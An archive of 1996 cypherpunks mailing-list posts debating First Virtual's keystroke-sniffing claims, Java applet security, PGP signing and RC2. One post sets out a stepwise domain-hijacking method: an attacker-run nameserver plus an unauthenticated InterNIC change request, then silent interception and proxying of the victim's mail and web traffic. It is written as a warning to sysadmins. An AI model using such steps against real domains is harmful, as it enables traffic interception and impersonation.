> To:            cypherpunks@toad.com
> From:          "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
> Subject:       Security First Network Bank, FSB. The World's 1st Internet Bank

> Just got something in the post today asking for me to set up an account with
> them...
> 
> - Daily reconciled bank statement and checkbook register; All transactions are
> logged for you. - No min balance - 20 free electronic bill payments per
> month... - ATM at Honor and Cirus.. - 200 free paper checks... - plenty of
> pre-stamped deposit envolopes - FDIC insured accounts (in case anyone ever
> steals my password..) - Wired Funds..
>

Mis-features
  - Uses Public key crypto but web pages do not mention PGP,
     says keys may come in mail on floppy; how to fingerprint key?
  -  Online only based system
      Drawbacks include system downtime means being unable to
      access your 'checkbook'
      No extraction features for those of us who use true double entry
      accounting systems, much less Quicken or even spreadsheets.
  - Bill paying system
      Four day lead on bills to be paid (can you say float?)
      Laser-printed statement sent to payee for 'verfication'
       will be subject to payees security restrictions which may
       consist of tossing it unshredded into the trash.
  - No chaum-like digital money provisions.



Although it is a step in the right direction, I won't be happy until the
bank accepts e-mail directives for generating chaumian cash or
instant EFT payments via messages encrypted against PGP keys.

Lets face it FINCEN already knows all about your income sources
if they are at all bank based (i.e. excluding barter and cash), but at
least I can have my check EFT'd, encrypt a PGP transaction to send
all my money to Seychelles, and pay bills from that Offshore bank
that really does respect my privacy.  This would at least make discerning
that my foley's bill is $120 a month more difficult since FINCEN would now
have to have cooperation from the payee.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 30 Jan 1996 23:59:59 +0800
To: cypherpunks@toad.com
Subject: Re: FL Demonstrates Fatal Flaw in Logins
In-Reply-To: <v02140a03ad32fed1edf8@[18.157.1.107]>
Message-ID: <9601301448.AA28567@outland>
MIME-Version: 1.0
Content-Type: text/plain



> However, I don't know much about Java, would it be possible to make such an
> applet with Java?

	<Sigh>, Java: the new 'net boogey-man (next to keyboard sniffers,
of course :).  The functionallity is not there for arbitrary keyboard
sniffing.  An applet can only see kbd events in windows in it's heirarchy,
upto the toplevel window wich is embeded in the browser (and in any 
toplevel windows, but these all have the "Untrusted Applet Window" warning
at the bottom).

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 00:19:38 +0800
To: Jeremym@area1s220.residence.gatech.edu>
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
In-Reply-To: <2.2.32.19960130042632.00966364@area1s220.residence.gatech.edu>
Message-ID: <4l3X3B2Mc50eNIr1ES@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV's Borenstein discove.. Jeremy
Mineweaser@area1s (1692*)

> Question: Could you please describe the nature of the First Virtual 
> protocol?  Now before you tell me to RTFM, let me explain.

> I assume, although without absolute certainty, that in order to bill me
> you must know my credit card number.  If you do not know my credit
> card number, and depend on someone else who does, you are nothing
> more than a middleman who introduces additional possibility for
> breach of security.  If you do know my credit card number, you must
> deal with the associated problem of storing this number.  Now perhaps
> I am wrong, and you really do keep all of your clients' card numbers
> in a printed book hidden within a safe, and for each transaction you
> remove the book, use your table to match FV_ID to CC#, process the
> transaction, and replace the book.  However, I doubt this.  More
> likely, you store the card numbers on a computer.  And no doubt,
> someone or something enters those numbers into a database.

> You have just violated your own cardinal rule.

Nope, afraid not.  We keep the credit card numbers on a non-Internet
computer.  The only communication between it and the Internet world is a
proprietary *batch* protocol.  If you break through multiple firewalls
to our most secure Internet machine, then you can begin
reverse-engineering the batch protocol, and even then, there's nothing
in the protocol that will send credit card numbers back over.  

As to how the credit card numbers are entered:  they are entered at
account setup time via a telephone call.  Yes, telephones can be tapped,
but it's really hard to set up an automated attack that taps all the
phone calls and retrieves all the credit card numbers.  Moreover,
eventually we hope to have the credit card numbers downloaded directly
from the credit card issuing banks, thus elminating even the telephone
vulnerability.

Believe me, we've thought a LOT about this.  Please check out our
academic paper on our first year of operation, which you can find at
http://www.fv.com/pubdocs/fv-austin.txt -- I think it will answer a lot
of your questions.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 00:38:41 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Signature use and key trust (Was: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit)
In-Reply-To: <199601300431.XAA23839@opine.cs.umass.edu>
Message-ID: <El3X_NGMc50e1Ir2Vs@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: Signature use and key t..
Futplex@pseudonym.com (2183*)

> In my world, "you" == nsb@nsb.fv.com, and hence "your key" == the key I could
> fetch from nsb+faq@nsb.fv.com.

Right, absolutely.  But let's face it, by now you believe it's me
anyway, or the real nsb@nsb.fv.com would have spoken up and argued with
me.  On the other hand,  if I start routinely PGP-signing email, then
the value of slowly brute-force cracking my private key goes way up.  If
FV is successful, for example, you could spend a few years breaking my
key, and then forge apparently-slanderous signed mail from me to you as
part of a lawsuit.  This would be far more believable, in a court of
law, if I routinely signed everything than if I didn't.  

I don't routinely sign things because I think it is asking for problems
with retrospective forgery down the road.  I might, however, consider
routinely signing things once I can easily incorporate a digital
timestamping service like the one from Surety into my signature.

> FWIW, I have lost a great deal of respect for you today

I sincerely hope that you will gain it back when you realize that not
all "hype" is without substance, and that we really have unveiled a
genuine, previously-unrecognized, and extremely important flaw in
commercial mechanims that purport to offer security through the software
encryption of credit card numbers.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 31 Jan 1996 00:46:26 +0800
To: timo@microsoft.com
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
Message-ID: <9601301502.AA17143@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>The key is large-scale automated attacks, not one-time interceptions.

Without proving you can deploy it's bullshit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Wed, 31 Jan 1996 00:49:47 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <199601300412.XAA23037@opine.cs.umass.edu>
Message-ID: <9601301504.AA28584@outland>
MIME-Version: 1.0
Content-Type: text/plain



> Much more likely, IMHO, than a Java sniffer is a Java Trojan horse that pops 
> up an innocuous dialog box and asks you to enter some sensitive piece of
> information, then sends it off somewhere. About all it takes to write that is
> a modicum of skill in user interface design. You could write it in any 
> programming language, but in Java it may be particularly effective, since 
> people may come to expect to be prompted for sensitive info over the net by 
> Java apps. Maybe the Java folks who just left Sun decided to seize the
> opportunity ;>

	But both Sun's and Netscape's implementations make Frame (new
toplevel) windows have "Untrusted Applet Window" sprawled across the
bottom of them.

	On a (kinda) related note someone from Sun posted to c.l.java
that they're going to be releasing a signing mechanism for applets 
soon.  You'll be able to verify that the code comes from where it
says it does so at least when it steals your CC# you'll know whom to
go hunt down.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: watson@tds.com
Date: Wed, 31 Jan 1996 04:42:53 +0800
To: Paul Graham <pg@viaweb.com>
Subject: Re: your bogus post
In-Reply-To: <199601301524.KAA06011@tintin.uun.org>
Message-ID: <Pine.SOL.3.91.960130100318.10851A-100000@mailman.tds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jan 1996, Paul Graham wrote:

>... 
> A company capable of doing such irresponsible things is not one 
> that we would trust with users' money.
> ...

Some of you must have missed the superbowl ads where people and frogs 
were getting frozen to beverage cans, and movie actors moved the grand 
canyon with a horse.  Marketing is a fact of life.  Seems to me the 
irresponsibile thing too many of our society do is put too much stock in 
the marketeers.  I usually select products on their merits, not on the 
marketing.  Maybe you do too.  But the marekting works, and companies 
have to use it to stay profitable.

So, what do you think of their product?

Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 00:59:16 +0800
To: jwz@netscape.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <9601300006.AA15845@sulphur.osf.org>
Message-ID: <Al3XFX6Mc50e5Ir5wC@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Jamie
Zawinski@netscape. (473*)

> I'll bet they could get a patent on it...  There's probably some
> money to be made with that approach.

Actually, I'm pretty sure it was Eric Hughes who said something like
(apologies if I'm misquoting or misremembering) "The most profitable
course of action, for a person who discovers a security hole, is almost
always to keep quiet about it."  It's very easy to see how a criminal
can make money with this approach, but it's much harder to see how a
legitimate business could do so.  We did what we thought was the
responsible thing, and tried to describe it in terms that were also in
our business interest.

Now, if I figure out how to really *solve* this problem, that would be
worth patenting.... :-) -- NB
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 31 Jan 1996 04:24:42 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <310E0D83.111A@netscape.com>
Message-ID: <Pine.SOL.3.91.960130100922.8758A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



So there you have it - FV offers "security through irrelevancy"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Wed, 31 Jan 1996 01:48:05 +0800
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <9601301358.AA14772@alpha>
Message-ID: <Pine.SUN.3.91.960130101707.24113C-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jan 1996, Mike McNally wrote:

> Rich Graves writes:
>  > Hmm. Actually, what do Java dialog prompts look like? Is there any
>  > indication that they come from Java, or can they be made to look like any
>  > dialog from any program, or the OS itself? I suppose this is
>  > implementation-dependent. 
> 
> Yes, it's completely dependent on the AWT implementation.  (Or, of
> course, on the implementation of whatever graphical library provided
> by the particular Java runtime environment in question.)
> 
> The "standard" AWT that's used in the Netscape (and maybe HotJava)
> web browsers decorates all windows applets create such that it's
> obvious they're there.  It is designed to be impossible for the applet
> itself to corrupt the AWT such that the windows don't bear that
> decoration.  (Whether the design works as advertised is a question
> worth asking, of course.)

But the fact that Java windows are obvious doesn't seem to really speak 
to the question of can they be faked from *outside* Java.

In fact, very distinctive windows for Java are likely to increase the 
success of an attack which duplicates the window decorations perfectly, 
because people will be used to it.

Eternal vigilance, etc.
J.L.
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.org (Rishab Aiyer Ghosh)
Date: Wed, 31 Jan 1996 05:06:22 +0800
To: nit@chron.com
Subject: Domain hijacking, InterNIC loopholes
Message-ID: <9601301819.AA00964@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



While filling in details for modification of my domain (dxm.org)
I realised that I haven't seen much written on domain hijacking.

We all know about mail spoofing, which let's you pretend you're
someone else. Mail spoofing is one-way - you can send, but not
receive. This is the same with IP spoofing, where you pretend
to be a trusted machine, but again you can send but not receive.
Unlike IP spoofing, which can lead to major security breaks (you
can become root on someone else's machine), domain hijacking is
not so much a security issue as a commercial one. Domain hijacking
uses loopholes in InterNIC domain registration procedures to 
completely take over a domain, allowing you to send and receive
e-mail, and other traffic such as ftp/www. As I haven't seen this
explained, and have seen no warnings for sysadmins, here goes:

To do 'IP hijacking' (receive packets as well as send) you 
will need to modify routing tables all over the place, where 
you're not likely to have access. To do domain hijacking,
you would need to modify DNS entries in several nameservers,
to which again you're not likely to have privileged access. On
the other hand, if you could associate an existing domain with
a nameserver you _do_ control (root access on any machine 
connected to the Net is enough for this), your lack of access
to the present nameservers would become irrelevant. So,
1. set up a nameserver on your machine, with address, cname or
   MX records as required for the victim domain address - victim.com.
   You can do fancy things with nslookup on victim.com's existing
   nameservers to find out what's required. Make sure the MX, address
   and cname records in your machine point to machines under your
   control.
2. send a modify domain mail to hostmaster@internic.net, with
   your machine as nameserver replacing any existing ones. The 
   InterNIC has no authentication procedures for normal hostmaster 
   requests, so your modification will get processed.
3. Ta DA! Wait for InterNIC to update its records and broadcast
   changes to other nameservers. From then on, a lookup for victim.com
   will go to ns.internic.net, find that ns.evil.org is the nameserver,
   and send all mail to @victim.com to victim.evil.org, route traffic
   to www.victim.com to www.evil.org, whatever you want.
   
This is not a security risk? No. But, to quote a delightfully
low-key document from InterNIC, "[such] an unauthorized update 
could lead a commercial organization to lose its presence on 
the Internet until that update is reversed."

Ah. But that update will be reversed only when victim.com's sysadmins
realise what's happened. If evil.org is clever enough, it will
not halt the mail flow, but forward everything on to victim.com
(after keeping a copy, of course). It could act as a proxy server
to www.victim.com, accessing all URLs (using victim.com's real
IP address) on demand and relaying them to browsers who are actually 
looking at www.evil.org. And so on. Unless victim.com's admins
are particularly observant, they may not notice a thing.

How many sysadmins out there do what victim.com could have done? I.e.
run nslookup on victim.com regularly to check that the nameservers
listed are as they should be, and if they're not, to immediately
send a new update to InterNIC? Not many, I believe. On the other
hand I know no case of domain hijacking actually taking place. But
I don't know specific instances of WWW credit card fraud either.

That delightful InterNIC document I mentioned is the draft paper
on the InterNIC Guardian Object, first out in November 1995, latest
version out earlier this month. It's an internal InterNIC proposal
for a "Guardian Object" which would guard any other object (such
as a domain name, or individual, or hostname, or even another
guardian). It would allow a range of authentication methods, from
none (very clever) and MAIL-FROM (easy to spoof) to CRYPT (1-way
hash, like Unix passwd) and PGP (using public keys stored at
InterNIC). All domain and other templates will be changed to
work with guardians. The procedures in the original draft looked
easy enough; the latest ones are formidable.

Incidentally, this draft appeared two months after the InterNIC
started charging. The wonders of the profit motive.


Rishab

ps. I'm not quite back on the Cypherpunks list yet, so please Cc
responses you feel are important to me at rishab@dxm.org.
pps. I quite forgot. The URL for the latest Guardian Object draft:
     ftp://rs.internic.net/policy/internic/internic-gen-1.txt
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 02:00:25 +0800
To: andreas@horten.artcom.de (Andreas Bogk)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Message-ID: <Yl3XRQCMc50e5Ir7pt@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 30-Jan-96 Re: FV Demonstrates Fatal F.. Andreas
Bogk@horten.artc (2677)

> First, pray tell, what prevents me from writing a virus that patches,
> say, Eudora and Netscape, so they automatically reply to all FV-mails?

Nothing at all.  But it's still not an automated mass-scale attack,
because that's only one piece of the mechanism (which we spell out) for
breaking FV.  The essence of FV's security is that we don't believe that
there's any single bit of technology or magic (cryptographic or
otherwise) that provides security, and that real security comes from a
series of complex defenses.  This approach is particularly good at
discouraging automated attacks.

Moreover, this attack is almost guaranteed to leave traces and be
detected within a single billing cycle.  Once the credit card bill comes
in, the patch in Eudora/Netscape will be discovered, and people will
start looking for its source.  In contrast, the scheme I have outlined
steals credit card numbers without any connection to the point of theft,
which in practice will mean that the attack will go undiagnosed and
without countermeasures for a lot longer, because there will be no
obvious correlation to the Internet as a point of theft.

> > to identify the corresponding email address (which
> >is not public knowledge, cannot be determined from the account
> >identifier, and will not be released by First Virtual); 

> ... which is in the header of said E-Mail ...

Typically, they flow over the web, where there's no email address
present.  You need traffic analysis.  Just makes it harder to automate,
that's all.

> And while I'm at it, it doesn't take much to be more secure than
> credit card payments. You shouldn't be too proud of that.

We're very proud of it because it's the competition.

> And it shouldn't take an experienced programmer one whole week to
> write a keyboard sniffer.

That included the user interface and a number of precautionary
mechanisms, with very careful coding to make sure that there weren't
hidden problems that would bite us.  The engineer who wrote it is very
good, but I also know that several people have since duplicated the
basic mechanism in a day or two.

> But I think it's not too pessimistic to say that _any_ software-based
> payment scheme can be hacked using malicious programs.

Right.  And the key, as I keep saying, is automation.  You have to
defend against an automated attack.

> Oh, wow, it's your secret. I would post a message containing the
> credit card number encrypted with a public key cipher to
> alt.foo.bar. Or to the IRC. And it's not too difficult to hack
> university computers, so I could even receive mail there without being
> traceable. Not to speak of remailer chains. Any other ideas?

Actually, one of your methods is very close to my preferred method, but
there are still some better wrinkles possible.  I prefer to leave them
as an exercise for the reader -- my academic background, I guess.  :-)  
 -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 31 Jan 1996 05:00:59 +0800
To: cypherpunks@toad.com
Subject: Re: New Mailing List (encrypted)
Message-ID: <199601301821.KAA02564@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Jan 1996 13:42:49 -0600, <perry@vishnu.alias.net> wrote:

>	I have installed PGPdomo on vishnu.alias.net. I've also
>created a new mailing list that you can join if you wish. It's a
>closed mailing list, so subscriptions must be approved. What makes

If we have attempted to subscribe, but received no response, does that 
mean that we didn't get approved?  If so, how can we "qualify"?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 31 Jan 1996 05:18:50 +0800
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: Sad state of affairs
In-Reply-To: <9601301402.AA15555@alpha>
Message-ID: <Pine.SOL.3.91.960130101401.8758B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Jan 1996, Mike McNally wrote:

> 
> bofur@alpha.c2.org writes:
>  > It's a pretty sad statement of how poorly this list is functioning when
>  > the RC2 source can be publically released but people would rather
>  > sling mud over glorified keystroke trappers and rant about Nazi deathcamps.
> 
> YIPPPEEE!!!  HOORAY!!!  YA HOOO!!!!!  RC2 IS PUBLIC!!!!  GOD BLESS US
> ALL!!!  HOORAAAAAAY!!!!  YAY!!!!!
> 
:-)

THere is no truth in the report that Algorithm choosers were added to
BSAFE so it would be easier to leave RC2 out :-) Assuming this is RC2, 
that is...

When someone reverse engineered Prince (the algorithm formerly known as 
RC4), that was significant as the code was in widespread use, and was a 
nice fast stream cypher, which was pretty much an empty niche. RC2 is 
fighting for an already populated area, battling IDEA, 3DES, etc, etc. 

Oh yeah, and RC4 is really pretty, whereas RC2, is as ugly as DES and friends





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Graham <pg@viaweb.com>
Date: Wed, 31 Jan 1996 01:37:26 +0800
To: cypherpunks@toad.com
Subject: your bogus post
Message-ID: <199601301524.KAA06011@tintin.uun.org>
MIME-Version: 1.0
Content-Type: text/plain


We run an online mall.  We had been planning eventually to offer the
store owners the option of taking fv payment as well as credit 
card numbers.

After reading your recent post to cypherpunks, which I would say is
the most bogus post ever made on this bogus subject, we are 
determined *not* to use fv payment systems if we can possibly 
avoid it.

That post was news to no one.  The kind of attack you "discovered"
has been known about for years, and is just not a serious threat.
Your post was nothing but a calculated attempt to frighten end
users, and get publicity for fv.  

A company capable of doing such irresponsible things is not one 
that we would trust with users' money.

-- pg




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 01:59:04 +0800
To: cman@communities.com (Douglas Barnes)
Subject: Re: More FUD from the Luddites at FV [pt. 2]
In-Reply-To: <v02130502ad33448ac18b@[199.2.22.120]>
Message-ID: <wl3XYbuMc50e1Ir_Ze@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 More FUD from the Luddites .. Douglas
Barnes@communiti (3569*)

> Whether you're a business or an individual, having, say, your
> hard drive wiped clean by a virus would be several orders of
> magnitude worse than the relatively minor inconvenience of
> having to get unauthorized items deleted from your credit card bill.

For the consumer, absolutely.

For the bank, having millions of credit cards compromised by a single
attacker is a more serious risk.

--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 31 Jan 1996 01:49:32 +0800
To: carboy@hooked.net (Michael E. Carboy)
Subject: Re: Cyphercoding Training Wheels??
In-Reply-To: <01BAEE8F.D6BF3860@chum-55.ppp.hooked.net>
Message-ID: <199601301530.KAA07194@homeport.org>
MIME-Version: 1.0
Content-Type: text


Michael E. Carboy wrote:

| I have been lurking as a newbie on the cypherpunks mailing list for =
| 'bout one month.  Have ordered Koblitz book on Number Theory and Applied =
| Cryptography.  As I slowly (and probably painfully) learn some number =
| theory, I would like to start coding, particularly as it would related =
| to encrypting and decrypting stuff.  I ask the community's input as to =
| whether I should use visual basic or visual C++ ??? I am using a =
| windoze95 platform.

When you consider that many of the people who will grab this code &
play with it DON'T run on MS scaffolding (its not really a platform
:), I'd suggest C++, and make sure you isolate the MS specific
portions, so that whatever you do can be ported.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 13:02:31 +0800
To: adam@lighthouse.homeport.org>
Subject: Re: Authentication of crypto clients
In-Reply-To: <199601300532.AAA05850@homeport.org>
Message-ID: <Ql3XeauMc50eFIrAQG@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 30-Jan-96 Re: Authentication of crypt.. Adam
Shostack@homeport.o (4311*)

> 	A crypto provider can't protect itself from requests to do
> things.  What it might be able to do is find out what program is in
> that memory space and tell the user "FV keyboard scanner would like to
> run IDEA on 128 bytes of data.  Allow?"

> 	There are flaws in this 'whos that knocking on my door?'
approach....

Yeah, the flaws are pretty bad.  We tried this approach in "active mail"
systems back in the early-to-mid-1980's.  The user was asked to assess
his trust level for the email-received code that was trying to run.  The
problem we found was that even relatively sophisticated users were very
quick to be fooled into believing that the "From" address was
legitimate.  Similarly, I suspect that if I named my keyboard scanner
"Windows 95", most people would probably be fooled, and the fact that
your API asked the question would only make the user feel MORE secure
about saying "yes".....
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 31 Jan 1996 02:33:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The FV Problem = A Press Problem
In-Reply-To: <ad3308ec2c0210043fb2@[205.199.118.202]>
Message-ID: <0l3Xq6uMc50eFIr1IW@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 30-Jan-96 The FV Problem = A Press Pr.. Timothy C.
May@got.net (2439*)

> But, it occurred to me, this is just part of the larger syndrom. Simson's
> article was practically written from the FV press release. While he
> interviewed some "security experts," clearly the timing of his article
> (this morning) and the announcement by Nathaniel of his discovery (this
> morning) suggests the cozy relationship involved.

FYI, you've got the order of events completely backwards.  We haven't
yet even written a press release, actually, though we're likely to do so
shortly.  The first news was Simson's story.  We wanted to make sure
that the first reporter was sophisticated enough to understand the
story, and Simson (as the author of "Practical UNIX Security" certainly
qualifies.)  Simson's story appeared on the Web and AOL, which prompted
my statement in response to that story.  -- NB
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 31 Jan 1996 12:58:46 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
In-Reply-To: <kl3Wc7OMc50eRIr810@nsb.fv.com>
Message-ID: <199601301548.KAA07271@homeport.org>
MIME-Version: 1.0
Content-Type: text


Nathaniel Borenstein wrote:

| >  But I just can't believe that he thinks that
| the telephone is more secure on average than a keyboard.
| 
| We have a few pages of C code that scan everything you type on a
| keyboard, and selects only the credit card numbers.  How easy is that to
| do with credit card numbers spoken over a telephone?

I don't speak my credit card number into the FV line, I DTMF it.
Whats more, I do so after the interactive voice system says the words
'credit card.'  In fact, a group of people may have been running a tap
& scan on FV's line for a long time now, using each number they steal
once.

	Credit cards are crappy financial instruments, made useful
mainly by the governments limitations of liability rules.  Why defend
them?

	FV's attack is pretty bogus, but no more bogus, and possibly
less, than the Power One Time Pads.  We're going to see a lot of smoke
and mirrors in the next few years regarding security.

	Anyone have anything to say about RC2?  Someone must have
written a main() for it?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 31 Jan 1996 02:13:17 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Signature use and key trust (Was: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit)
In-Reply-To: <El3X_NGMc50e1Ir2Vs@nsb.fv.com>
Message-ID: <199601301551.KAA07294@homeport.org>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Expire your keys annually.  You know about key lifetimes & expiry, and
in fact talk about them at length in your 'Experiences' paper.  So I
assert that this is a straw man.  The included key has an expiration
date on it.


Nathaniel Borenstein wrote:

| Right, absolutely.  But let's face it, by now you believe it's me
| anyway, or the real nsb@nsb.fv.com would have spoken up and argued with
| me.  On the other hand,  if I start routinely PGP-signing email, then
| the value of slowly brute-force cracking my private key goes way up.  If
| FV is successful, for example, you could spend a few years breaking my
| key, and then forge apparently-slanderous signed mail from me to you as
| part of a lawsuit.  This would be far more believable, in a court of
| law, if I routinely signed everything than if I didn't.  

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCKAzBjLm4AAAED53EETCG11u/jmMQmWvp1wRU10XUOtXjC/3zVGS23G3bv0o7F
JqdYDWJBp1Rzjb5p6t8KXTPVwx1ZXG8AvJcNFyZiYUznDiHDCT9JScQG5NL++C3r
x6n2YaQLooQgsw5l9aWEJ9Qi3UnQOVA2ZkaYs9RQdJsH8N5XP6PQNGpRAAURtC5B
ZGFtIFNob3N0YWNrIDxhZGFtQGhvbWVwb3J0Lm9yZz4gW0V4cCBBdWcgOTZdiQCV
AwUQMGMuqAWt5TRah1f5AQGjiwP9H3VhNDLNvNkll2Db7ccQlppbFgFjxj5/MTBj
jFD7+FRZcSG4kpbkLYz4gPwY/upf+9N8dp+lEKXNtYLFVfSCkPSMAQhRK1PA4aqv
YlTerDwWQxt4Zyv8H30GO2zm0TkCMWMS6ZZN9U/jk0t7VTYOFvW7sQeiKV4BDScd
7eU62XM=
=Z34o
- -----END PGP PUBLIC KEY BLOCK-----


- -- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCSAwUBMQ4+ZN5XP6PQNGpRAQE4IQPmLiLyT7/7VAw6Z5ajqDlJCiMwubUQTtc+
pCo3RPZjJ8IakLvgXF06LJoIK7ObYbgfRED90v/LNlZivE1CpHQb9QRobNYqIBgU
ZQBw4NkqCAS9kH4K+LrK1ce4sPF8gLBwZBSS+PJXS+BBW6Tp2kDF534Ro6x+hMOV
k1Xuc7s=
=GlZS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 31 Jan 1996 05:52:18 +0800
To: cypherpunks@toad.com
Subject: Two bits, Four Bits, ETC
Message-ID: <199601301853.KAA13801@well.com>
MIME-Version: 1.0
Content-Type: text/plain




BEGIN IBM LOTUS'S GAK'ED MESSAGE--
-----BEGIN PGP SIGNED MESSAGE-----

Two Bits:

frantz@netcom.com (Bill Frantz)

>One other small advantage I can see to using Lotus's crippled
